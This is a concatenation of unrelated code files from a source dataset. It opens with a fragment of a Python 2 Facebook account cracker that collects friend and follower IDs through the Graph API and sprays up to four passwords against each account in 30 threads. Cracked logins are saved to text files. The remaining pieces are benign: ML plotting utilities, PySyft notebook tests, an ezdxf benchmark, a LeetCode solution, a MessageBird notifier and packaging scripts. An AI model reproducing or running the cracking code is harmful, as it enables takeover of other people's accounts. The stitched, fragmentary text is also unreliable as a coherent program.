print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~Choice public cracking~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input(' \033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '2':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice followers cracking ~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input('\033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999')
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '3':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
try:
idlist= raw_input('[+] File Name: ')
for line in open(idlist ,'r').readlines():
id.append(line.strip())
except IOError:
print"[!] File Not Found."
raw_input('Press Enter To Back. ')
crack()
elif a_s == '0':
menu()
else:
print ''
print '\tChoose valid option' + w
a_s()
print ' Total ids: ' + str(len(id))
time.sleep(0.5)
print ' \033[1;92mCrack Running\033[1;94m '
time.sleep(0.5)
print 47 * '-'
print '\t\033[1;95mITz MPG BRAND \033[1;94m'
print 47 * '-'
def main(arg):
user = arg
(uid, name) = user.split('|')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass1, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass1
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass1
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass2, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass2
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass2 + '\n')
ok.close()
oks.append(uid + pass2)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass2
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass2 + '\n')
cp.close()
cps.append(uid + pass2)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass3, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass3
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass3 + '\n')
ok.close()
oks.append(uid + pass3)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass3
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass3 + '\n')
cp.close()
cps.append(uid + pass3)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass4, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass4
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass4 + '\n')
ok.close()
oks.append(uid + pass4)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass4
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass4 + '\n')
cp.close()
cps.apppend(uid + pass4)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 47 * '-'
print ' \033[1;92mMPG BranD PROGRAMMING'
print ' \033[1;92mTotal \033[1;95mOk\033[1;90m/\033[1;97mCp:' + str(len(oks)) + '/' + str(len(cps))
print 47 * '-'
raw_input(' \033[1;90mPress enter to back')
auto_crack()
if __name__ == '__main__':
reg()
| StarcoderdataPython |
11265737 | import json
import pandas as pd
from pathlib import Path
from itertools import repeat
from collections import OrderedDict
import numpy as np
import matplotlib.pyplot as plt
import itertools
import sklearn
import io
from sklearn.metrics import confusion_matrix
from torchvision import transforms
from PIL import Image
from model.metric import Metric
import argparse
def plot_confusion_matrix(cm, class_names):
    """
    Returns a matplotlib figure containing the plotted confusion matrix.

    Args:
        cm (array, shape = [n, n]): a confusion matrix of integer classes
        class_names (array, shape = [n]): String names of the integer classes
    """
    figure = plt.figure(figsize=(8, 8))
    # The heat map shows the *raw* counts; the cell texts below show
    # row-normalized fractions.
    plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues)
    plt.title("Confusion matrix")
    plt.colorbar()
    ticks = np.arange(len(class_names))
    plt.xticks(ticks, class_names, rotation=45)
    plt.yticks(ticks, class_names)

    # Row-normalize so each cell reads as "fraction of this true label".
    row_sums = cm.sum(axis=1)[:, np.newaxis]
    cm = np.around(cm.astype('float') / row_sums, decimals=2)

    # Pick a text colour that contrasts with the cell shading.
    threshold = cm.max() / 2.
    for row, col in itertools.product(range(cm.shape[0]), range(cm.shape[1])):
        shade = "white" if cm[row, col] > threshold else "black"
        plt.text(col, row, cm[row, col], horizontalalignment="center", color=shade)

    plt.tight_layout()
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
    return figure
def plot_to_image(figure):
    """Rasterize *figure* to an in-memory PNG and return the buffer.

    The supplied figure is closed and inaccessible after this call.

    Args:
        figure: the matplotlib figure to convert.

    Returns:
        io.BytesIO positioned at offset 0, containing the PNG bytes.
    """
    # Save the plot to a PNG in memory.  Bug fix: use figure.savefig instead
    # of plt.savefig -- the latter saves whatever figure is "current", which
    # is not necessarily the one passed in.
    buf = io.BytesIO()
    figure.savefig(buf, format='png')
    # Closing the figure prevents it from being displayed directly inside
    # the notebook.
    plt.close(figure)
    buf.seek(0)
    # Bug fix: the old code called Image.open(buf.getvalue()), which raises
    # TypeError (Image.open needs a file-like object, not raw bytes), and
    # discarded the resulting tensor anyway.  Callers only consume the PNG
    # buffer, so the dead conversion has been removed.
    return buf
# Class labels used for the confusion-matrix axes (the ten CIFAR-10 categories).
classes = ('plane', 'car', 'bird', 'cat',
           'deer', 'dog', 'frog', 'horse', 'ship', 'truck')
def confusion_matrix_image(output, target):
    """Build a confusion-matrix figure from raw model outputs and true labels."""
    # Detach from the graph and move to numpy; predictions are the arg-max
    # class per sample.
    true_labels = target.detach().numpy()
    predictions = np.argmax(output.detach().numpy(), axis=1)
    cm = confusion_matrix(true_labels, predictions)
    # Render the confusion matrix as an image summary.
    return plot_confusion_matrix(cm, class_names=classes)
def ensure_dir(dirname):
    """Create directory *dirname* (including parents) if it does not exist.

    Uses mkdir(exist_ok=True) so a concurrent creation between check and
    mkdir cannot raise, unlike the previous is_dir()-then-mkdir sequence.
    Still raises FileExistsError if *dirname* exists as a regular file.
    """
    Path(dirname).mkdir(parents=True, exist_ok=True)
def read_json(fname):
    """Read *fname* as JSON, preserving key order via OrderedDict."""
    text = Path(fname).read_text()
    return json.loads(text, object_hook=OrderedDict)
def write_json(content, fname):
    """Serialize *content* to *fname* as 4-space-indented JSON."""
    with Path(fname).open('wt') as handle:
        json.dump(content, handle, indent=4, sort_keys=False)
def inf_loop(data_loader):
    """Yield items from *data_loader* forever, re-iterating it at each pass."""
    while True:
        yield from data_loader
def str2bool(v):
    """Parse a boolean-ish CLI value; raise ArgumentTypeError otherwise.

    Booleans pass through unchanged; strings are matched case-insensitively
    against common yes/no spellings.
    """
    if isinstance(v, bool):
        return v
    lowered = v.lower()
    if lowered in ('yes', 'true', 't', 'y', '1'):
        return True
    if lowered in ('no', 'false', 'f', 'n', '0'):
        return False
    raise argparse.ArgumentTypeError('Boolean value expected.')
class MetricTracker:
    """Track running totals, counts, and averages for a fixed set of metrics.

    Backed by a small pandas DataFrame with one row per metric name.  If a
    *writer* is supplied, each update is also forwarded to
    writer.add_scalar (e.g. a TensorBoard-style writer).
    """

    def __init__(self, *keys, writer=None):
        self.writer = writer
        self._data = pd.DataFrame(index=keys, columns=['total', 'counts', 'average'])
        self.reset()

    def reset(self):
        """Zero every column for every tracked metric."""
        for column in self._data.columns:
            self._data[column].values[:] = 0

    def update(self, key, value, n=1):
        """Record *value* observed *n* times for metric *key*."""
        if self.writer is not None:
            self.writer.add_scalar(key, value)
        self._data.at[key, 'total'] += value * n
        self._data.at[key, 'counts'] += n
        self._data.at[key, 'average'] = self._data.at[key, 'total'] / self._data.at[key, 'counts']

    def avg(self, key):
        """Return the running average for *key*."""
        return self._data.at[key, 'average']

    def result(self):
        """Return a dict mapping each metric name to its running average."""
        return self._data['average'].to_dict()
1731757 | from __future__ import annotations
# pylint: disable=no-member
import datetime
from typing import List, Any
from instascrape.core._static_scraper import _StaticHtmlScraper
from instascrape.core._mappings import _PostMapping
class Post(_StaticHtmlScraper):
    """Scraper for a single Instagram post page.

    Scraping machinery comes from _StaticHtmlScraper; _PostMapping tells the
    base class which scraped fields map to which attributes.
    """

    _Mapping = _PostMapping

    def load(self, keys: List[str] = [], exclude: List[str] = []):
        # NOTE(review): `exclude` is accepted but never forwarded to
        # super().load() -- confirm whether it should be passed through.
        # NOTE(review): the mutable [] defaults are shared across calls;
        # harmless here only because they are never mutated.
        super().load(keys=keys)
        # The scraped value is a unix timestamp; replace it with a datetime.
        self.upload_date = datetime.datetime.fromtimestamp(self.upload_date)

    @classmethod
    def from_shortcode(cls, shortcode: str) -> Post:
        """Build a Post pointed at https://www.instagram.com/p/<shortcode>/."""
        url = f"https://www.instagram.com/p/{shortcode}/"
        return cls(url, name=shortcode)
| StarcoderdataPython |
4896066 | <reponame>Rishav1/PySyft
import glob
import os
import sys
import time
import urllib.request
from pathlib import Path
from zipfile import ZipFile
import pytest
import nbformat
import numpy as np
import pandas as pd
import papermill as pm
import torch
import syft as sy
from syft import TorchHook
from syft.workers.websocket_server import WebsocketServerWorker
# lets start by finding all notebooks currently available in examples and subfolders
# Collect every notebook currently available in examples/ and subfolders.
all_notebooks = [Path(path) for path in glob.glob("examples/tutorials/**/*.ipynb", recursive=True)]

# Notebooks known to be broken, with the reason they are skipped.
exclusion_list_notebooks = [
    # Part 10 needs either torch.log2 to be implemented or numpy to be hooked
    "Part 10 - Federated Learning with Secure Aggregation.ipynb",
    # Part 13b and c need fixing of the tensorflow serving with PySyft
    "Part 13b - Secure Classification with Syft Keras and TFE - Secure Model Serving.ipynb",
    "Part 13c - Secure Classification with Syft Keras and TFE - Private Prediction Client.ipynb",
    # This notebook is excluded as it needs library code modification which I might add later on
    "Build your own tensor type (advanced).ipynb",
    "Federated Recurrent Neural Network.ipynb",
]

# Folders whose notebooks cannot run in this test environment.
exclusion_list_folders = [
    "examples/tutorials/websocket",
    "examples/tutorials/advanced/Monitor_Network_Traffic",
    "examples/tutorials/advanced/websockets-example-MNIST-parallel",
    # To run these notebooks, we need to run grid nodes / grid gateway previously (they aren't in this repository)
    "examples/tutorials/grid",
    "examples/tutorials/grid/federated_learning/spam_prediction",
    "examples/tutorials/grid/federated_learning/mnist",
    # This notebook is skipped because it fails in travis and we do not know why for the moment
    "examples/tutorials/advanced/Federated SMS Spam prediction",
]

# Everything not excluded above must be exercised by one of the tests below;
# each test removes what it ran, and the final test asserts the list is empty.
not_excluded_notebooks = [
    notebook
    for notebook in all_notebooks
    if notebook.name not in exclusion_list_notebooks
    and str(notebook.parent) not in exclusion_list_folders
]
def test_notebooks_basic(isolated_filesystem):
    """Test Notebooks in the tutorial root folder."""
    notebooks = glob.glob("*.ipynb")
    for notebook in notebooks:
        # Mark this notebook as covered so test_not_tested_notebooks (which
        # must run last) can assert that nothing was silently skipped.
        list_name = Path("examples/tutorials/") / notebook
        if list_name in not_excluded_notebooks:
            not_excluded_notebooks.remove(list_name)
        # Tiny epoch/batch/item counts keep the CI run fast.
        res = pm.execute_notebook(
            notebook,
            "/dev/null",
            parameters={
                "epochs": 1,
                "n_test_batches": 5,
                "n_train_items": 64,
                "n_test_items": 64,
            },
            timeout=300,
        )
        assert isinstance(res, nbformat.notebooknode.NotebookNode)


def test_notebooks_basic_translations(isolated_filesystem):
    """Test translated copies of the tutorial root-folder notebooks."""
    notebooks = glob.glob("translations/**/*.ipynb", recursive=True)
    for notebook in notebooks:
        list_name = Path("examples/tutorials/") / notebook
        if list_name in not_excluded_notebooks:
            not_excluded_notebooks.remove(list_name)
        res = pm.execute_notebook(
            notebook,
            "/dev/null",
            parameters={
                "epochs": 1,
                "n_test_batches": 5,
                "n_train_items": 64,
                "n_test_items": 64,
            },
            timeout=300,
        )
        assert isinstance(res, nbformat.notebooknode.NotebookNode)


def test_notebooks_advanced(isolated_filesystem):
    """Test Notebooks in the advanced folder (incl. Split Neural Network)."""
    notebooks = glob.glob("advanced/*.ipynb")
    notebooks += glob.glob("advanced/Split Neural Network/*.ipynb")
    for notebook in notebooks:
        list_name = Path("examples/tutorials/") / notebook
        if list_name in not_excluded_notebooks:
            not_excluded_notebooks.remove(list_name)
        # These notebooks only accept an "epochs" parameter.
        res = pm.execute_notebook(notebook, "/dev/null", parameters={"epochs": 1}, timeout=300)
        assert isinstance(res, nbformat.notebooknode.NotebookNode)
def test_fl_with_trainconfig(isolated_filesystem, start_remote_server_worker_only, hook):
    """Run the TrainConfig notebook against a live remote worker "alice".

    A remote worker is started with a small XOR dataset, the notebook runs
    against it, and a VirtualWorker "alice" is re-registered afterwards so
    later tests see a clean registry.
    """
    os.chdir("advanced/Federated Learning with TrainConfig/")
    notebook = "Introduction to TrainConfig.ipynb"
    p_name = Path("examples/tutorials/advanced/Federated Learning with TrainConfig/")
    not_excluded_notebooks.remove(p_name / notebook)
    # The notebook needs a *remote* alice, so drop the local registration first.
    hook.local_worker.remove_worker_from_registry("alice")
    kwargs = {"id": "alice", "host": "localhost", "port": 8777, "hook": hook}
    data = torch.tensor([[0.0, 1.0], [1.0, 0.0], [1.0, 1.0], [0.0, 0.0]], requires_grad=True)
    target = torch.tensor([[1.0], [1.0], [0.0], [0.0]], requires_grad=False)
    dataset = sy.BaseDataset(data, target)
    process_remote_worker = start_remote_server_worker_only(dataset=(dataset, "xor"), **kwargs)
    res = pm.execute_notebook(notebook, "/dev/null", timeout=300)
    assert isinstance(res, nbformat.notebooknode.NotebookNode)
    process_remote_worker.terminate()
    # Restore a local "alice" for subsequent tests.
    sy.VirtualWorker(id="alice", hook=hook, is_client_worker=False)


@pytest.mark.skip
def test_fl_sms(isolated_filesystem):  # pragma: no cover
    """Run the SMS-spam notebook after downloading and preprocessing its data.

    Currently skipped; its folder is also in exclusion_list_folders above
    (fails on travis for unknown reasons).
    """
    sys.path.append("advanced/Federated SMS Spam prediction/")
    import preprocess

    os.chdir("advanced/Federated SMS Spam prediction/")
    notebook = "Federated SMS Spam prediction.ipynb"
    p_name = Path("examples/tutorials/advanced/Federated SMS Spam prediction/")
    not_excluded_notebooks.remove(p_name / notebook)
    Path("data").mkdir(parents=True, exist_ok=True)
    url = "https://archive.ics.uci.edu/ml/machine-learning-databases/00228/smsspamcollection.zip"
    urllib.request.urlretrieve(url, "data.zip")
    with ZipFile("data.zip", "r") as zipObj:
        # Extract all the contents of the zip file in current directory
        zipObj.extractall()
    preprocess.main()
    res = pm.execute_notebook(notebook, "/dev/null", parameters={"epochs": 1}, timeout=300)
    assert isinstance(res, nbformat.notebooknode.NotebookNode)


def test_fl_with_websockets_and_averaging(
    isolated_filesystem, start_remote_server_worker_only, hook
):
    """Run the federated-averaging notebook against three remote workers."""
    os.chdir("advanced/websockets-example-MNIST/")
    notebook = "Federated learning with websockets and federated averaging.ipynb"
    p_name = Path("examples/tutorials/advanced/websockets-example-MNIST/")
    not_excluded_notebooks.remove(p_name / notebook)
    for n in ["alice", "bob", "charlie"]:
        hook.local_worker.remove_worker_from_registry(n)
    kwargs_list = [
        {"id": "alice", "host": "localhost", "port": 8777, "hook": hook},
        {"id": "bob", "host": "localhost", "port": 8778, "hook": hook},
        {"id": "charlie", "host": "localhost", "port": 8779, "hook": hook},
    ]
    processes = [start_remote_server_worker_only(**kwargs) for kwargs in kwargs_list]
    # abort_after_one stops the notebook after a single round to bound runtime.
    res = pm.execute_notebook(
        notebook,
        "/dev/null",
        parameters={"args": ["--epochs", "1", "--test_batch_size", "100"], "abort_after_one": True},
        timeout=300,
    )
    assert isinstance(res, nbformat.notebooknode.NotebookNode)
    [server.terminate() for server in processes]
    # Restore local workers for subsequent tests.
    for n in ["alice", "bob", "charlie"]:
        sy.VirtualWorker(id=n, hook=hook, is_client_worker=False)
def test_not_tested_notebooks():
    """This test must always be last: every notebook should have been run."""
    leftover = not_excluded_notebooks
    assert len(leftover) == 0, leftover
| StarcoderdataPython |
6429560 | <gh_stars>100-1000
# Copyright (c) 2020, <NAME>
# License: MIT License
import os
import time
from ezdxf.lldxf.tagger import ascii_tags_loader, tag_compiler
from ezdxf.recover import safe_tag_loader
from ezdxf import EZDXF_TEST_FILES
BIG_FILE = os.path.join(EZDXF_TEST_FILES, "CADKitSamples", "torso_uniform.dxf")
def load_ascii():
    """Benchmark text-mode loading: ASCII tag loader piped into the compiler."""
    with open(BIG_FILE, "rt") as stream:
        tags = ascii_tags_loader(stream)
        list(tag_compiler(iter(tags)))
def safe_load_bytes():
    """Benchmark binary-mode loading via the error-tolerant tag loader."""
    with open(BIG_FILE, "rb") as stream:
        list(safe_tag_loader(stream))
def print_result(time, text):
    """Print a one-line timing report for operation *text* taking *time* seconds."""
    message = "Operation: {} takes {:.2f} s\n".format(text, time)
    print(message)
def run(func):
    """Return the wall-clock seconds *func* takes to execute once."""
    started = time.perf_counter()
    func()
    return time.perf_counter() - started
if __name__ == "__main__":
print_result(run(safe_load_bytes), "safe_tag_loader()")
print_result(run(load_ascii), "ascii_tag_compiler()")
| StarcoderdataPython |
# test_src.py
# -----------
# Basically a sample script that can be run to unlock any
# Achievements specified below.  Each commented section names the
# achievement the construct beneath it is meant to trigger; the constructs
# themselves are deliberate and should not be "simplified" away.
import dev_achievements

# HelloWorldAchievement
# NOTE(review): 'Helo world' looks like a deliberate near-miss immediately
# followed by the canonical greeting -- confirm against the achievement rules.
print('Helo world', end='')
print('\nHello World!')

# AssignAchievement
x = 4

# MathOperatorsAchievement
x += 1

# BitwiseOperatorsAchievement
# These expressions have no effect; they only exercise the operators.
x << 2
x ^ 2

# ConditionalAchievement
if x < 4:
    x = 4
else:
    x = 5

# LoopsAchievement
for i in range(2):
    x + i
x = 0
while x < 5:
    x += 1

# ComprehensionAchievement
x = [i for i in range(10)]

# PassAchievement
for _ in range(2):
    pass

# FunctionAchievement
def some_func():
    pass

def some_other_func():
    pass

some_func()

# LambdaAchievement
lf = lambda x: x + 1

# ListAchievement
x = [4, 5, 6]

# DictAchievement
x = {'name': '<NAME>'}

# ClassAchievement
class Test:
    pass

class OtherTest:
    pass

t = Test()
9734761 | __source__ = 'https://leetcode.com/problems/number-of-segments-in-a-string/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/number-of-segments-in-a-string.py
# Time: O(n)
# Space: O(1)
# Count the number of segments in a string,
# where a segment is defined to be a contiguous
# sequence of non-space characters.
#
# Description: Leetcode # 434. Number of Segments in a String
#
# Please note that the string does not
# contain any non-printable characters.
#
# Example:
#
# Input: "Hello, my name is John"
# Output: 5
# String
#
import unittest
class Solution(object):
    """Count whitespace-separated segments in a string (LeetCode 434)."""

    def countSegments(self, s):
        """Idiomatic solution: str.split() drops all runs of whitespace.

        :type s: str
        :rtype: int
        """
        return len(s.split())

    def countSegments1(self, s):
        """O(1)-space scan counting segment *ends*.

        A segment ends at the last character (if it is non-space) or at any
        non-space character followed by a space.

        :type s: str
        :rtype: int
        """
        result = int(len(s) and s[-1] != ' ')
        # Bug fix: the original used Python 2's `xrange`, a NameError on
        # Python 3 (the rest of this file is Python 3).
        for i in range(1, len(s)):
            if s[i] == ' ' and s[i - 1] != ' ':
                result += 1
        return result

    def countSegments2(self, s):
        """Split on single spaces and count the non-empty fragments.

        :type s: str
        :rtype: int
        """
        return len([piece for piece in s.strip().split(' ') if piece])
class TestMethods(unittest.TestCase):
    """Trivial smoke test so the module stays runnable under unittest."""

    def test_Local(self):
        self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
# Thought: https://leetcode.com/problems/number-of-segments-in-a-string/solution/
# 5ms 10.30%
class Solution {
public int countSegments(String s) {
return ("x " + s).split(" +").length - 1;
}
}
# 1ms 100%
class Solution {
public int countSegments(String s) {
int res = 0;
for (int i = 0; i < s.length(); i++) {
if (s.charAt(i) != ' ' && ( i == 0 || s.charAt(i-1) == ' ')) {
res++;
}
}
return res;
}
}
'''
| StarcoderdataPython |
204775 | from flask_wtf import FlaskForm
from wtforms.fields import SelectMultipleField
from wtforms.validators import DataRequired
class SelectForm(FlaskForm):
    """Form with a single required multi-select field.

    NOTE(review): `choices` is empty at class-definition time; presumably the
    view populates `response.choices` before rendering/validation -- confirm
    against the callers.
    """
    response = SelectMultipleField('Response', choices=[],
                                   validators=[DataRequired()])
11849 | #!/usr/bin/env python3
# NOTE: this file does not have the executable bit set. This tests that
# Meson can automatically parse shebang lines.
import sys
template = '#define RET_VAL %s\n'

# Use context managers so both file handles are closed deterministically
# (the old one-liners leaked the handles until garbage collection).
with open(sys.argv[1]) as infile:
    value = infile.readline().strip()
with open(sys.argv[2], 'w') as outfile:
    outfile.write(template % value)
| StarcoderdataPython |
9654499 | <filename>homeassistant/components/message_bird/notify.py
"""MessageBird platform for notify component."""
import logging
import voluptuous as vol
from homeassistant.const import CONF_API_KEY, CONF_SENDER
import homeassistant.helpers.config_validation as cv
from homeassistant.components.notify import (
ATTR_TARGET,
PLATFORM_SCHEMA,
BaseNotificationService,
)
_LOGGER = logging.getLogger(__name__)
# Extend the base notify-platform schema: an API key is required, and the
# optional sender (default "HA") must match the regex below -- either an
# international phone number ("+" and 2-15 digits, first digit non-zero) or
# an alphanumeric id of 1-11 characters.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_API_KEY): cv.string,
        vol.Optional(CONF_SENDER, default="HA"): vol.All(
            cv.string, vol.Match(r"^(\+?[1-9]\d{1,14}|\w{1,11})$")
        ),
    }
)
def get_service(hass, config, discovery_info=None):
    """Get the MessageBird notification service.

    Returns None (service unavailable) when the configured API key is
    rejected by MessageBird.
    """
    # Imported here rather than at module level so the package is only
    # required when this platform is actually set up.
    import messagebird

    client = messagebird.Client(config[CONF_API_KEY])
    try:
        # validates the api key
        client.balance()
    except messagebird.client.ErrorException:
        _LOGGER.error("The specified MessageBird API key is invalid")
        return None

    return MessageBirdNotificationService(config.get(CONF_SENDER), client)
class MessageBirdNotificationService(BaseNotificationService):
    """Implement the notification service for MessageBird."""

    def __init__(self, sender, client):
        """Initialize the service.

        sender: originator string (validated by PLATFORM_SCHEMA).
        client: an authenticated messagebird.Client.
        """
        self.sender = sender
        self.client = client

    def send_message(self, message=None, **kwargs):
        """Send a message to every target in kwargs[ATTR_TARGET]."""
        from messagebird.client import ErrorException

        targets = kwargs.get(ATTR_TARGET)
        if not targets:
            _LOGGER.error("No target specified")
            return

        for target in targets:
            try:
                # Attach a client reference ("HA") to the outgoing message.
                self.client.message_create(
                    self.sender, target, message, {"reference": "HA"}
                )
            except ErrorException as exception:
                # Log and keep going so one bad target does not stop the rest.
                _LOGGER.error("Failed to notify %s: %s", target, exception)
                continue
| StarcoderdataPython |
1894466 | import unittest
import torch.cuda as cuda
from inferno.utils.model_utils import ModelTester
class UNetTest(unittest.TestCase):
    """Smoke tests for inferno's UNet in 2D and 3D.

    NOTE(review): ModelTester presumably builds an input of the first shape
    and checks the model's output against the second shape -- confirm in
    inferno.utils.model_utils.
    """

    def test_unet_2d(self):
        from inferno.extensions.models import UNet
        # Input and expected output shapes agree: (batch, channels, H, W).
        tester = ModelTester((1, 1, 256, 256), (1, 1, 256, 256))
        if cuda.is_available():
            tester.cuda()
        tester(UNet(1, 1, dim=2, initial_features=32))

    def test_unet_3d(self):
        from inferno.extensions.models import UNet
        # (batch, channels, D, H, W) for the volumetric variant.
        tester = ModelTester((1, 1, 16, 64, 64), (1, 1, 16, 64, 64))
        if cuda.is_available():
            tester.cuda()
        # test default unet 3d
        tester(UNet(1, 1, dim=3, initial_features=8))
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
from setuptools import setup

# Reuse the README verbatim as the package's long description.
with open("README.md", "r") as fh:
    long_description = fh.read()

# NOTE(review): long_description is Markdown but no
# long_description_content_type="text/markdown" is passed -- PyPI may render
# it as plain text; confirm before publishing.
setup(name='PyTorch-ProbGraph',
      version='0.0.1',
      description='Hierarchical Probabilistic Graphical Models in PyTorch',
      long_description=long_description,
      author='<NAME>, <NAME>',
      author_email='<EMAIL>, <EMAIL>',
      url='https://github.com/kpoeppel/pytorch_probgraph/',
      packages=['pytorch_probgraph'],
      install_requires=['torch', 'numpy', 'matplotlib', 'tqdm',
                        'sphinx_rtd_theme', 'sphinx', 'setuptools'],
      classifiers=[
          "Programming Language :: Python :: 3",
          "License :: OSI Approved :: BSD License",
          "Operating System :: OS Independent",
      ],
      python_requires='>=3.6',
      )
| StarcoderdataPython |
1988392 | <reponame>suzaku/plain_obj
from keyword import iskeyword
from collections import OrderedDict
def new_type(type_name, field_names):
    """Create a slot-based record type named *type_name*.

    *field_names* may be a sequence of names or a single string with names
    separated by commas and/or whitespace.  All names are validated and
    duplicates rejected.
    """
    if isinstance(field_names, str):
        # names separated by whitespace and/or commas
        field_names = field_names.replace(',', ' ').split()

    check_name(type_name)
    seen = set()
    for field in field_names:
        check_name(field)
        if field in seen:
            raise ValueError('Encountered duplicate field name: %r' % field)
        seen.add(field)

    namespace = {
        '__slots__': field_names,
        '__init__': make_constructor(field_names),
    }
    return type(type_name, (PlainBase,), namespace)
class PlainBase(object):
    """Base class for plain record types: iteration, equality, repr, to_dict."""

    def __eq__(self, other):
        """Equal iff *other* is an instance of this class with matching fields."""
        if not isinstance(other, self.__class__):
            return False
        return all(mine == theirs for mine, theirs in zip(self, other))

    def __iter__(self):
        """Yield field values in __slots__ order."""
        for field in self.__slots__:
            yield getattr(self, field)

    def __repr__(self):
        return self.__class__.__name__ + repr(tuple(self))

    def to_dict(self):
        """Return an OrderedDict mapping field names to their values."""
        return OrderedDict(zip(self.__slots__, self))
def make_constructor(fields):
    """Synthesize an __init__ that stores each parameter on its same-named slot."""
    params = ', '.join(fields)
    body = '\n'.join('    self.{0} = {0}'.format(name) for name in fields)
    source = 'def __init__(self, %s):\n%s' % (params, body)
    scope = {}
    # NOTE: callers (new_type) validate the field names before reaching here,
    # so exec on the generated source is safe.
    exec(source, scope)
    return scope['__init__']
def check_name(name):
    """Validate *name* as a usable type/field identifier; raise ValueError if not."""
    if not all(ch.isalnum() or ch == '_' for ch in name):
        raise ValueError('Type names and field names can only contain alphanumeric characters and underscores: %r' % name)
    if iskeyword(name):
        raise ValueError('Type names and field names cannot be a keyword: %r' % name)
    if name[0].isdigit():
        raise ValueError('Type names and field names cannot start with a number: %r' % name)
| StarcoderdataPython |
3282948 | <filename>processSingleJobs.py
#!/usr/bin/python
#------------------------------------------------------------------------------
# Name: processSingleJobs.py
# Author: <NAME>, 20150205
# Last Modified: 20150218
#This is a follow-up to the lookThresh.py script; it reads the top_jobs.txt list
# and analyses each candidate job for stats etc. A couple of functions are
# re-used from lookThresh.py, so it's imported here.
#------------------------------------------------------------------------------
import os
import string
from lookThresh import *
from singleJob import *
# Read the candidate job ids from top_jobs.txt; lines starting with '%' are
# comments.  The first whitespace-separated column holds the job id.
jobId = []
with open("top_jobs.txt", 'r') as topJobsFile:
    for line in topJobsFile:
        if not line[0] == '%':
            jobId.append(line.split()[0])
# Checks that jobId is less than ten candidates, otherwise put rest at the
# back, after upper limits plot.  jobIdTail is always defined so later code
# can use it even when there are ten candidates or fewer (it used to be
# left undefined, raising NameError downstream).
jobIdTail = []
if len(jobId) > 10:
    jobIdTail = jobId[10:]
    # Was jobId[0:9], which silently dropped the tenth candidate.
    jobId = jobId[0:10]
def jobOut(jobId):
    """Build the report lines for every candidate job id in *jobId*.

    Returns a list of strings: a header line, the per-job summary from
